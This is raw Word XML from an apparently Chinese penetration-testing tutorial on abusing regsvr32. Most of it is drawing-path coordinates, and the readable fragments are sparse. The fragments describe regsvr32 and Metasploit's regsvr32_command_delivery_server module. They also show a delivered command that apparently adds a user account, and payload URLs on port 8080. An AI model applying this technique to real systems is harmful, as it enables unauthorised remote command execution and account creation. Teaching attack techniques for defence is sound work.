,15302,2147,15302,2149,15302,2151,15302,2152,15302,2154,15302,2156,15302,2158,15302,2160,15302,2162,15302,2164,15302,2166,15302,2168,15302,2171,15302,2173,15302,2175,15302,2178,15302,2180,15302,2182,15302,2185,15302,2187,15302,2190,15302,2192,15302,2195,15302,2198,15302,2201,15302,2203,15302,2206,15302,2209,15302,2212,15302,2215,15302,2215,15302,2215,15302,2215,15302,2215,15302,2215,15302,2215,15302,2215,15302,2215,15302,2215,15302,2215,15302,2215,15302,2215,15302,2215,15302,2215,15302,2215,15302,2215,15302,2215,15302,2215,15302,2215,15303,2215,15303,2215,15303,2215,15303,2215,15303,2215,15304,2215,15304,2215,15304,2215,15304,2215,15305,2215,15305,2215,15305,2215,15306,2215,15306,2215,15307,2215,15307,2215,15308,2215,15308,2215,15309,2215,15309,2215,15310,2215,15311,2215,15311,2215,15312,2215,15313,2215,15314,2215,15315,2215,15316,2215,15316,2215,15317,2215,15318,2215,15320,2215,15321,2215,15322,2215,15323,2215,15324,2215,15326,2215,15327,2215,15328,2215,15330,2215,15331,2215,15333,2215,15334,2215,15336,2215,15338,2215,15340,2215,15341,2215,15343,2215,15345,2215,15347,2215,15349,2215,15351,2215,15354,2215,15356,2215,15358,2215,15361,2215,15363,2215,15366,2215,15368,2215,15371,2215,15374,2215,15376,2215,15379,2215,15382,2215,15385,2215,15388,2215,15391,2215,15395,2215,15398,2215,15401,2215,15405,2215,15408,2215,15412,2215,15416,2215,15420,2215,15423,2215,15427,2215,15432,2215,15436,2215,15440,2215,15444,2215,15449,2215,15453,2215,15458,2215,15462,2215,15467,2215,15472,2215,15477,2215,15482,2215,15487,2215,15492,2215,15498,2215,15503,2215,15509,2215,15514,2215,15520,2215,15526,2215,15532,2215,15538,2215,15544,2215,15550,2215,15557,2215,15557,2215,15557,2215,15557,2215,15557,2215,15557,2215,15557,2215,15557,2215,15557,2215,15557,2215,15557,2215,15557,2215,15557,2215,15557,2215,15557,2215,15557,2215,15557,2215,15557,2215,15557,2215,15557,2215,15557,2215,15557,2214,15557,2214,15557,2214,15557,2214,15557,2214,15557,2214,15557,2214,15557,2214,15557,2213,15557,2213,15557,2213,15557,2213,15557,2213,15557,2212,15557,2212,15557,2212,15557,2212,15557,2211,15557,2211,15557,2211,15557,2210,15557,2210,15557,2209,15557,2209,15557,2209,15557,2208,15557,2208,15557,2207,15557,2207,15557,2206,15557,2206,15557,2205,15557,2205,15557,2204,15557,2203,15557,2203,15557,2202,15557,2201,15557,2200,15557,2200,15557,2199,15557,2198,15557,2197,15557,2196,15557,2196,15557,2195,15557,2194,15557,2193,15557,2192,15557,2191,15557,2190,15557,2189,15557,2187,15557,2186,15557,2185,15557,2184,15557,2183,15557,2181,15557,2180,15557,2179,15557,2177,15557,2176,15557,2174,15557,2173,15557,2171,15557,2170,15557,2168,15557,2167,15557,2165,15557,2163,15557,2161,15557,2160,15557,2158,15557,2156,15557,2154,15557,2152,15557,2150,15557,2148,15557,2146,15557,2144,15557,2142,15557,2140,15557,2137,15557,2135,15557,2133,15557,2130,15557,2128,15557,2125,15557,2123,15557,2120,15557,2118,15557,2115,15557,2112,15557,2110,15557,2107,15557,2104,15557,2101,15557,2098,15557,2095,15557,2095,15557,2095,15557,2095,15557,2095,15557,2095,15557,2095,15557,2095,15557,2095,15557,2095,15557,2095,15557,2095,15557,2095,15557,2095,15557,2095,15557,2095,15556,2095,15556,2095,15556,2095,15556,2095,15556,2095,15556,2095,15556,2095,15555,2095,15555,2095,15555,2095,15555,2095,15554,2095,15554,2095,15554,2095,15554,2095,15553,2095,15553,2095,15552,2095,15552,2095,15551,2095,15551,2095,15550,2095,15550,2095,15549,2095,15549,2095,15548,2095,15547,2095,15546,2095,15546,2095,15545,2095,15544,2095,15543,2095,15542,2095,15541,2095,15540,2095,15539,2095,15538,2095,15537,2095,15536,2095,15534,2095,15533,2095,15532,2095,15530,2095,15529,2095,15527,2095,15526,2095,15524,2095,15522,2095,15521,2095,15519,2095,15517,2095,15515,2095,15513,2095,15511,2095,15509,2095,15507,2095,15505,2095,15503,2095,15500,2095,15498,2095,15495,2095,15493,2095,15490,2095,15488,2095,15485,2095,15482,2095,15479,2095,15476,2095,15473,2095,15470,2095,15467,2095,15464,2095,15461,2095,15457,2095,15454,2095,15450,2095,15446,2095,15443,2095,15439,2095,15435,2095,15431,2095,15427,2095,15423,2095,15419,2095,15414,2095,15410,2095,15405,2095,15401,2095,15396,2095,15391,2095,15387,2095,15382,2095,15377,2095,15371,2095,15366,2095,15361,2095,15355,2095,15350,2095,15344,2095,15338,2095,15333,2095,15327,2095,15321,2095,15314,2095,15308,2095,1530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请多喝</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>点热水或者凉白开，身体特别重要。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6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>egsvr32简介：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50" w:firstLine="483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Regsvr32命令用于注册COM组件，是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系统提供的用来向系统注册控件或者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卸载控件的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命令，以命令行方式运行。WinXP及以上系统的regsvr32.exe在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windows\system32文件夹下；2000系统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的regsvr32.exe在winnt\system32文件夹下。但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搭配regsvr32.exe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使用的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DLL，需要提供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DllRegisterServer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和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DllUnregisterServer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两个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输出函式，或者提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供DllInstall输出函数。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433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Regsvr32.exe所在路径已被系统添加PATH环境变量中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，因此，Regsvr32命令可识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别。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:\WINDOWS\SysWOW64\regsvr32.exe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:\WINDOWS\system32\regsvr32.exe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10"/>
        </w:rPr>
        <w:t>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msf已内置auxiliary版本的regsvr32_command_delivery_server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，但是最新版已经无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exploit版本reg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svr32，文章结尾补充。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26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regsvr32_command_delivery_server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="2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server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regsvr32_command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_delivery_server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regsvr32_command_delivery_server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="23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CMD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ser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Micropoor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Micropoor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add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CMD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Micropoor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Micropoor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add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214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regsvr32_command_delivery_server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="2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//0.0.0.0:8080/ybn7xESQYCGv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IP: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//192.168.1.4:8080/ybn7xESQYCGv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122.786pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10402,0" coordsize="0,2455">
        <v:shape style="position:absolute;left:10402;top:0;width:0;height:2455" coordorigin="10402,0" coordsize="0,2455" path="m10402,0l10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,1,10402,1,10402,1,10402,2,10402,3,10402,4,10402,4,10402,5,10402,7,10402,8,10402,9,10402,11,10402,13,10402,15,10402,17,10402,20,10402,22,10402,25,10402,28,10402,31,10402,35,10402,39,10402,43,10402,47,10402,52,10402,57,10402,62,10402,67,10402,73,10402,79,10402,86,10402,93,10402,100,10402,107,10402,115,10402,124,10402,132,10402,141,10402,151,10402,161,10402,171,10402,182,10402,193,10402,204,10402,216,10402,229,10402,242,10402,255,10402,269,10402,284,10402,299,10402,314,10402,330,10402,347,10402,364,10402,382,10402,400,10402,418,10402,438,10402,458,10402,478,10402,499,10402,521,10402,543,10402,566,10402,590,10402,614,10402,639,10402,665,10402,691,10402,718,10402,746,10402,774,10402,803,10402,833,10402,863,10402,894,10402,926,10402,959,10402,993,10402,1027,10402,1062,10402,1098,10402,1134,10402,1172,10402,1210,10402,1249,10402,1289,10402,1330,10402,1371,10402,1413,10402,1457,10402,1501,10402,1546,10402,1592,10402,1639,10402,1686,10402,1735,10402,1785,10402,1835,10402,1887,10402,1939,10402,1993,10402,2047,10402,2102,10402,2159,10402,2216,10402,2274,10402,2333,10402,2394,10402,2455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7.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,2090" coordsize="8990,350">
        <v:shape style="position:absolute;left:1490;top:2090;width:8990;height:350" coordorigin="1490,2090" coordsize="8990,35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1,10484,2112,10484,2112,10484,2112,10484,2113,10484,2113,10484,2113,10484,2114,10484,2114,10484,2115,10484,2115,10484,2116,10484,2116,10484,2117,10484,2117,10484,2118,10484,2119,10484,2120,10484,2120,10484,2121,10484,2122,10484,2123,10484,2124,10484,2125,10484,2126,10484,2128,10484,2129,10484,2130,10484,2131,10484,2133,10484,2134,10484,2136,10484,2137,10484,2139,10484,2141,10484,2142,10484,2144,10484,2146,10484,2148,10484,2150,10484,2152,10484,2154,10484,2157,10484,2159,10484,2161,10484,2164,10484,2166,10484,2169,10484,2172,10484,2174,10484,2177,10484,2180,10484,2183,10484,2187,10484,2190,10484,2193,10484,2196,10484,2200,10484,2204,10484,2207,10484,2211,10484,2215,10484,2219,10484,2223,10484,2227,10484,2231,10484,2236,10484,2240,10484,2245,10484,2250,10484,2254,10484,2259,10484,2264,10484,2270,10484,2275,10484,2280,10484,2286,10484,2291,10484,2297,10484,2303,10484,2309,10484,2315,10484,2321,10484,2327,10484,2334,10484,2340,10484,2347,10484,2354,10484,2361,10484,2368,10484,2375,10484,2383,10484,2390,10484,2398,10484,2406,10484,2414,10484,2422,10484,2430,10484,2438,10484,2447,10484,2455,10484,2455,10484,2455,10484,2455,10484,2455,10484,2455,10484,2455,10483,2455,10482,2455,10482,2455,10480,2455,10479,2455,10477,2455,10475,2455,10473,2455,10470,2455,10466,2455,10462,2455,10458,2455,10453,2455,10448,2455,10442,2455,10435,2455,10428,2455,10419,2455,10411,2455,10401,2455,10391,2455,10379,2455,10367,2455,10354,2455,10340,2455,10326,2455,10310,2455,10293,2455,10275,2455,10256,2455,10236,2455,10215,2455,10192,2455,10168,2455,10143,2455,10117,2455,10090,2455,10061,2455,10031,2455,9999,2455,9966,2455,9931,2455,9895,2455,9858,2455,9819,2455,9778,2455,9735,2455,9691,2455,9646,2455,9598,2455,9549,2455,9498,2455,9445,2455,9391,2455,9334,2455,9275,2455,9215,2455,9153,2455,9088,2455,9022,2455,8953,2455,8883,2455,8810,2455,8735,2455,8658,2455,8578,2455,8497,2455,8413,2455,8326,2455,8238,2455,8146,2455,8053,2455,7957,2455,7859,2455,7758,2455,7654,2455,7548,2455,7439,2455,7328,2455,7214,2455,7097,2455,6977,2455,6855,2455,6730,2455,6602,2455,6471,2455,6337,2455,6201,2455,6061,2455,5918,2455,5773,2455,5624,2455,5472,2455,5317,2455,5159,2455,4997,2455,4833,2455,4665,2455,4494,2455,4319,2455,4141,2455,3960,2455,3776,2455,3587,2455,3396,2455,3201,2455,3002,2455,2800,2455,2594,2455,2385,2455,2172,2455,1955,2455,1734,2455,1510,2455,1510,2455,1510,2455,1510,2455,1510,2455,1510,2455,1510,2455,1510,2455,1510,2455,1510,2455,1510,2455,1510,2455,1510,2455,1510,2455,1510,2455,1510,2455,1510,2455,1510,2454,1510,2454,1510,2454,1510,2454,1510,2454,1510,2453,1510,2453,1510,2453,1510,2452,1510,2452,1510,2452,1510,2451,1510,2451,1510,2450,1510,2450,1510,2449,1510,2449,1510,2448,1510,2447,1510,2446,1510,2446,1510,2445,1510,2444,1510,2443,1510,2442,1510,2441,1510,2440,1510,2439,1510,2438,1510,2437,1510,2435,1510,2434,1510,2433,1510,2431,1510,2430,1510,2428,1510,2426,1510,2425,1510,2423,1510,2421,1510,2419,1510,2417,1510,2415,1510,2413,1510,2411,1510,2409,1510,2406,1510,2404,1510,2402,1510,2399,1510,2396,1510,2394,1510,2391,1510,2388,1510,2385,1510,2382,1510,2379,1510,2376,1510,2372,1510,2369,1510,2365,1510,2362,1510,2358,1510,2354,1510,2350,1510,2346,1510,2342,1510,2338,1510,2334,1510,2329,1510,2325,1510,2320,1510,2316,1510,2311,1510,2306,1510,2301,1510,2296,1510,2290,1510,2285,1510,2280,1510,2274,1510,2268,1510,2262,1510,2256,1510,2250,1510,2244,1510,2238,1510,2231,1510,2225,1510,2218,1510,2211,1510,2204,1510,2197,1510,2190,1510,2183,1510,2175,1510,2167,1510,2160,1510,2152,1510,2144,1510,2136,1510,2127,1510,2119,1510,2110e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:121.500pt;width:449.500pt;height:1.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,2430" coordsize="8990,30">
        <v:shape style="position:absolute;left:1490;top:2430;width:8990;height:30" coordorigin="1490,2430" coordsize="8990,30" path="m1510,2448l1510,2448,1510,2448,1510,2448,1510,2448,1510,2448,1510,2448,1511,2448,1512,2448,1512,2448,1514,2448,1515,2448,1517,2448,1519,2448,1521,2448,1524,2448,1528,2448,1532,2448,1536,2448,1541,2448,1546,2448,1552,2448,1559,2448,1566,2448,1575,2448,1583,2448,1593,2448,1603,2448,1615,2448,1627,2448,1640,2448,1654,2448,1668,2448,1684,2448,1701,2448,1719,2448,1738,2448,1758,2448,1780,2448,1802,2448,1826,2448,1851,2448,1877,2448,1904,2448,1933,2448,1963,2448,1995,2448,2028,2448,2063,2448,2099,2448,2136,2448,2175,2448,2216,2448,2259,2448,2303,2448,2348,2448,2396,2448,2445,2448,2496,2448,2549,2448,2604,2448,2660,2448,2719,2448,2779,2448,2841,2448,2906,2448,2972,2448,3041,2448,3112,2448,3184,2448,3259,2448,3336,2448,3416,2448,3498,2448,3582,2448,3668,2448,3757,2448,3848,2448,3941,2448,4037,2448,4136,2448,4236,2448,4340,2448,4446,2448,4555,2448,4666,2448,4780,2448,4897,2448,5017,2448,5139,2448,5264,2448,5392,2448,5523,2448,5657,2448,5793,2448,5933,2448,6076,2448,6222,2448,6370,2448,6522,2448,6677,2448,6835,2448,6997,2448,7161,2448,7329,2448,7500,2448,7675,2448,7853,2448,8034,2448,8219,2448,8407,2448,8598,2448,8793,2448,8992,2448,9194,2448,9400,2448,9609,2448,9823,2448,10039,2448,10260,2448,10484,2448e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:74.400pt;margin-top:104.400pt;width:445.800pt;height:18.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" type="#_x0000_t75">
        <v:imagedata r:id="rId8" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:304.500pt;width:449.500pt;height:20.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,6090" coordsize="8990,410">
        <v:shape style="position:absolute;left:1490;top:6090;width:8990;height:410" coordorigin="1490,6090" coordsize="8990,41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2,10484,6102,10484,6103,10484,6103,10484,6103,10484,6103,10484,6103,10484,6103,10484,6104,10484,6104,10484,6104,10484,6105,10484,6105,10484,6105,10484,6106,10484,6106,10484,6107,10484,6107,10484,6108,10484,6109,10484,6109,10484,6110,10484,6111,10484,6112,10484,6112,10484,6113,10484,6114,10484,6115,10484,6116,10484,6117,10484,6119,10484,6120,10484,6121,10484,6123,10484,6124,10484,6125,10484,6127,10484,6129,10484,6130,10484,6132,10484,6134,10484,6136,10484,6138,10484,6140,10484,6142,10484,6144,10484,6147,10484,6149,10484,6151,10484,6154,10484,6157,10484,6159,10484,6162,10484,6165,10484,6168,10484,6171,10484,6174,10484,6178,10484,6181,10484,6185,10484,6188,10484,6192,10484,6196,10484,6200,10484,6204,10484,6208,10484,6212,10484,6216,10484,6221,10484,6225,10484,6230,10484,6235,10484,6240,10484,6245,10484,6250,10484,6255,10484,6260,10484,6266,10484,6272,10484,6277,10484,6283,10484,6289,10484,6295,10484,6302,10484,6308,10484,6315,10484,6322,10484,6328,10484,6335,10484,6343,10484,6350,10484,6357,10484,6365,10484,6373,10484,6380,10484,6388,10484,6397,10484,6405,10484,6413,10484,6422,10484,6431,10484,6440,10484,6449,10484,6458,10484,6468,10484,6477,10484,6487,10484,6497,10484,6507,10484,6507,10484,6507,10484,6507,10484,6507,10484,6507,10484,6507,10483,6507,10482,6507,10482,6507,10480,6507,10479,6507,10477,6507,10475,6507,10473,6507,10470,6507,10466,6507,10462,6507,10458,6507,10453,6507,10448,6507,10442,6507,10435,6507,10428,6507,10419,6507,10411,6507,10401,6507,10391,6507,10379,6507,10367,6507,10354,6507,10340,6507,10326,6507,10310,6507,10293,6507,10275,6507,10256,6507,10236,6507,10215,6507,10192,6507,10168,6507,10143,6507,10117,6507,10090,6507,10061,6507,10031,6507,9999,6507,9966,6507,9931,6507,9895,6507,9858,6507,9819,6507,9778,6507,9735,6507,9691,6507,9646,6507,9598,6507,9549,6507,9498,6507,9445,6507,9391,6507,9334,6507,9275,6507,9215,6507,9153,6507,9088,6507,9022,6507,8953,6507,8883,6507,8810,6507,8735,6507,8658,6507,8578,6507,8497,6507,8413,6507,8326,6507,8238,6507,8146,6507,8053,6507,7957,6507,7859,6507,7758,6507,7654,6507,7548,6507,7439,6507,7328,6507,7214,6507,7097,6507,6977,6507,6855,6507,6730,6507,6602,6507,6471,6507,6337,6507,6201,6507,6061,6507,5918,6507,5773,6507,5624,6507,5472,6507,5317,6507,5159,6507,4997,6507,4833,6507,4665,6507,4494,6507,4319,6507,4141,6507,3960,6507,3776,6507,3587,6507,3396,6507,3201,6507,3002,6507,2800,6507,2594,6507,2385,6507,2172,6507,1955,6507,1734,6507,1510,6507,1510,6507,1510,6507,1510,6507,1510,6507,1510,6507,1510,6507,1510,6507,1510,6507,1510,6507,1510,6507,1510,6507,1510,6507,1510,6507,1510,6507,1510,6507,1510,6506,1510,6506,1510,6506,1510,6506,1510,6506,1510,6505,1510,6505,1510,6505,1510,6504,1510,6504,1510,6504,1510,6503,1510,6503,1510,6502,1510,6501,1510,6501,1510,6500,1510,6499,1510,6499,1510,6498,1510,6497,1510,6496,1510,6495,1510,6494,1510,6493,1510,6492,1510,6491,1510,6489,1510,6488,1510,6487,1510,6485,1510,6484,1510,6482,1510,6481,1510,6479,1510,6477,1510,6475,1510,6473,1510,6471,1510,6469,1510,6467,1510,6465,1510,6463,1510,6460,1510,6458,1510,6455,1510,6453,1510,6450,1510,6447,1510,6444,1510,6441,1510,6438,1510,6435,1510,6432,1510,6428,1510,6425,1510,6421,1510,6418,1510,6414,1510,6410,1510,6406,1510,6402,1510,6398,1510,6393,1510,6389,1510,6384,1510,6379,1510,6375,1510,6370,1510,6365,1510,6360,1510,6354,1510,6349,1510,6343,1510,6338,1510,6332,1510,6326,1510,6320,1510,6314,1510,6308,1510,6301,1510,6295,1510,6288,1510,6281,1510,6274,1510,6267,1510,6260,1510,6252,1510,6245,1510,6237,1510,6229,1510,6221,1510,6213,1510,6204,1510,6196,1510,6187,1510,6178,1510,6169,1510,6160,1510,6151,1510,6142,1510,6132,1510,6122,1510,6112,1510,6102e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:74.400pt;margin-top:303.600pt;width:445.800pt;height:21.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" type="#_x0000_t75">
        <v:imagedata r:id="rId9" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:103.500pt;margin-top:51.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2070,1030" coordsize="130,270">
        <v:shape style="position:absolute;left:2070;top:1030;width:130;height:270" coordorigin="2070,1030" coordsize="130,270" path="m2095,1045l2095,1045,2095,1045,2095,1045,2095,1045,2095,1045,2095,1045,2095,1045,2095,1045,2095,1045,2095,1045,2095,1045,2095,1045,2095,1045,2095,1045,2095,1045,2095,1045,2095,1045,2095,1045,2095,1045,2096,1045,2096,1045,2096,1045,2096,1045,2096,1045,2096,1045,2096,1045,2096,1045,2096,1045,2097,1045,2097,1045,2097,1045,2097,1045,2097,1045,2098,1045,2098,1045,2098,1045,2098,1045,2099,1045,2099,1045,2099,1045,2100,1045,2100,1045,2100,1045,2101,1045,2101,1045,2102,1045,2102,1045,2102,1045,2103,1045,2103,1045,2104,1045,2105,1045,2105,1045,2106,1045,2106,1045,2107,1045,2108,1045,2108,1045,2109,1045,2110,1045,2110,1045,2111,1045,2112,1045,2113,1045,2114,1045,2115,1045,2116,1045,2116,1045,2117,1045,2118,1045,2119,1045,2121,1045,2122,1045,2123,1045,2124,1045,2125,1045,2126,1045,2128,1045,2129,1045,2130,1045,2132,1045,2133,1045,2134,1045,2136,1045,2137,1045,2139,1045,2140,1045,2142,1045,2144,1045,2145,1045,2147,1045,2149,1045,2151,1045,2152,1045,2154,1045,2156,1045,2158,1045,2160,1045,2162,1045,2164,1045,2166,1045,2168,1045,2171,1045,2173,1045,2175,1045,2178,1045,2180,1045,2182,1045,2185,1045,2187,1045,2190,1045,2192,1045,2195,1045,2198,1045,2201,1045,2203,1045,2206,1045,2209,1045,2212,1045,2215,1045,2215,1045,2215,1045,2215,1045,2215,1045,2215,1045,2215,1045,2215,1045,2215,1045,2215,1045,2215,1045,2215,1045,2215,1045,2215,1045,2215,1045,2215,1045,2215,1045,2215,1045,2215,1045,2215,1045,2215,1046,2215,1046,2215,1046,2215,1046,2215,1046,2215,1047,2215,1047,2215,1047,2215,1048,2215,1048,2215,1048,2215,1049,2215,1049,2215,1049,2215,1050,2215,1050,2215,1051,2215,1052,2215,1052,2215,1053,2215,1054,2215,1054,2215,1055,2215,1056,2215,1057,2215,1057,2215,1058,2215,1059,2215,1060,2215,1061,2215,1062,2215,1063,2215,1065,2215,1066,2215,1067,2215,1068,2215,1070,2215,1071,2215,1073,2215,1074,2215,1076,2215,1077,2215,1079,2215,1081,2215,1082,2215,1084,2215,1086,2215,1088,2215,1090,2215,1092,2215,1094,2215,1096,2215,1099,2215,1101,2215,1103,2215,1106,2215,1108,2215,1111,2215,1114,2215,1116,2215,1119,2215,1122,2215,1125,2215,1128,2215,1131,2215,1134,2215,1138,2215,1141,2215,1144,2215,1148,2215,1151,2215,1155,2215,1159,2215,1162,2215,1166,2215,1170,2215,1174,2215,1178,2215,1183,2215,1187,2215,1191,2215,1196,2215,1201,2215,1205,2215,1210,2215,1215,2215,1220,2215,1225,2215,1230,2215,1235,2215,1241,2215,1246,2215,1252,2215,1257,2215,1263,2215,1269,2215,1275,2215,1281,2215,1287,2215,1293,2215,1300,2215,1300,2215,1300,2215,1300,2215,1300,2215,1300,2215,1300,2215,1300,2215,1300,2215,1300,2215,1300,2215,1300,2215,1300,2215,1300,2215,1300,2215,1300,2215,1300,2215,1300,2215,1300,2215,1300,2215,1300,2215,1300,2214,1300,2214,1300,2214,1300,2214,1300,2214,1300,2214,1300,2214,1300,2214,1300,2213,1300,2213,1300,2213,1300,2213,1300,2213,1300,2212,1300,2212,1300,2212,1300,2212,1300,2211,1300,2211,1300,2211,1300,2210,1300,2210,1300,2209,1300,2209,1300,2209,1300,2208,1300,2208,1300,2207,1300,2207,1300,2206,1300,2206,1300,2205,1300,2205,1300,2204,1300,2203,1300,2203,1300,2202,1300,2201,1300,2200,1300,2200,1300,2199,1300,2198,1300,2197,1300,2196,1300,2196,1300,2195,1300,2194,1300,2193,1300,2192,1300,2191,1300,2190,1300,2189,1300,2187,1300,2186,1300,2185,1300,2184,1300,2183,1300,2181,1300,2180,1300,2179,1300,2177,1300,2176,1300,2174,1300,2173,1300,2171,1300,2170,1300,2168,1300,2167,1300,2165,1300,2163,1300,2161,1300,2160,1300,2158,1300,2156,1300,2154,1300,2152,1300,2150,1300,2148,1300,2146,1300,2144,1300,2142,1300,2140,1300,2137,1300,2135,1300,2133,1300,2130,1300,2128,1300,2125,1300,2123,1300,2120,1300,2118,1300,2115,1300,2112,1300,2110,1300,2107,1300,2104,1300,2101,1300,2098,1300,2095,1300,2095,1300,2095,1300,2095,1300,2095,1300,2095,1300,2095,1300,2095,1300,2095,1300,2095,1300,2095,1300,2095,1300,2095,1299,2095,1299,2095,1299,2095,1299,2095,1299,2095,1299,2095,1299,2095,1299,2095,1299,2095,1298,2095,1298,2095,1298,2095,1298,2095,1298,2095,1297,2095,1297,2095,1297,2095,1296,2095,1296,2095,1296,2095,1295,2095,1295,2095,1294,2095,1294,2095,1293,2095,1293,2095,1292,2095,1291,2095,1291,2095,1290,2095,1289,2095,1288,2095,1288,2095,1287,2095,1286,2095,1285,2095,1284,2095,1283,2095,1282,2095,1281,2095,1280,2095,1278,2095,1277,2095,1276,2095,1274,2095,1273,2095,1272,2095,1270,2095,1269,2095,1267,2095,1265,2095,1264,2095,1262,2095,1260,2095,1258,2095,1256,2095,1254,2095,1252,2095,1250,2095,1248,2095,1245,2095,1243,2095,1241,2095,1238,2095,1236,2095,1233,2095,1231,2095,1228,2095,1225,2095,1222,2095,1219,2095,1216,2095,1213,2095,1210,2095,1207,2095,1203,2095,1200,2095,1196,2095,1193,2095,1189,2095,1186,2095,1182,2095,1178,2095,1174,2095,1170,2095,1166,2095,1161,2095,1157,2095,1153,2095,1148,2095,1144,2095,1139,2095,1134,2095,1129,2095,1124,2095,1119,2095,1114,2095,1109,2095,1104,2095,1098,2095,1093,2095,1087,2095,1081,2095,1075,2095,1069,2095,1063,2095,1057,2095,1051,2095,1045e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:103.500pt;margin-top:70.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2070,1410" coordsize="130,250">
        <v:shape style="position:absolute;left:2070;top:1410;width:130;height:250" coordorigin="2070,1410" coordsize="130,250" path="m2095,1420l2095,1420,2095,1420,2095,1420,2095,1420,2095,1420,2095,1420,2095,1420,2095,1420,2095,1420,2095,1420,2095,1420,2095,1420,2095,1420,2095,1420,2095,1420,2095,1420,2095,1420,2095,1420,2095,1420,2096,1420,2096,1420,2096,1420,2096,1420,2096,1420,2096,1420,2096,1420,2096,1420,2096,1420,2097,1420,2097,1420,2097,1420,2097,1420,2097,1420,2098,1420,2098,1420,2098,1420,2098,1420,2099,1420,2099,1420,2099,1420,2100,1420,2100,1420,2100,1420,2101,1420,2101,1420,2102,1420,2102,1420,2102,1420,2103,1420,2103,1420,2104,1420,2105,1420,2105,1420,2106,1420,2106,1420,2107,1420,2108,1420,2108,1420,2109,1420,2110,1420,2110,1420,2111,1420,2112,1420,2113,1420,2114,1420,2115,1420,2116,1420,2116,1420,2117,1420,2118,1420,2119,1420,2121,1420,2122,1420,2123,1420,2124,1420,2125,1420,2126,1420,2128,1420,2129,1420,2130,1420,2132,1420,2133,1420,2134,1420,2136,1420,2137,1420,2139,1420,2140,1420,2142,1420,2144,1420,2145,1420,2147,1420,2149,1420,2151,1420,2152,1420,2154,1420,2156,1420,2158,1420,2160,1420,2162,1420,2164,1420,2166,1420,2168,1420,2171,1420,2173,1420,2175,1420,2178,1420,2180,1420,2182,1420,2185,1420,2187,1420,2190,1420,2192,1420,2195,1420,2198,1420,2201,1420,2203,1420,2206,1420,2209,1420,2212,1420,2215,1420,2215,1420,2215,1420,2215,1420,2215,1420,2215,1420,2215,1420,2215,1420,2215,1420,2215,1420,2215,1420,2215,1420,2215,1420,2215,1420,2215,1420,2215,1420,2215,1420,2215,1420,2215,1420,2215,1421,2215,1421,2215,1421,2215,1421,2215,1421,2215,1422,2215,1422,2215,1422,2215,1422,2215,1423,2215,1423,2215,1423,2215,1424,2215,1424,2215,1425,2215,1425,2215,1426,2215,1426,2215,1427,2215,1427,2215,1428,2215,1429,2215,1429,2215,1430,2215,1431,2215,1432,2215,1433,2215,1434,2215,1434,2215,1435,2215,1436,2215,1438,2215,1439,2215,1440,2215,1441,2215,1442,2215,1444,2215,1445,2215,1446,2215,1448,2215,1449,2215,1451,2215,1452,2215,1454,2215,1456,2215,1458,2215,1459,2215,1461,2215,1463,2215,1465,2215,1467,2215,1469,2215,1472,2215,1474,2215,1476,2215,1479,2215,1481,2215,1484,2215,1486,2215,1489,2215,1492,2215,1494,2215,1497,2215,1500,2215,1503,2215,1506,2215,1509,2215,1513,2215,1516,2215,1519,2215,1523,2215,1526,2215,1530,2215,1534,2215,1538,2215,1541,2215,1545,2215,1550,2215,1554,2215,1558,2215,1562,2215,1567,2215,1571,2215,1576,2215,1580,2215,1585,2215,1590,2215,1595,2215,1600,2215,1605,2215,1610,2215,1616,2215,16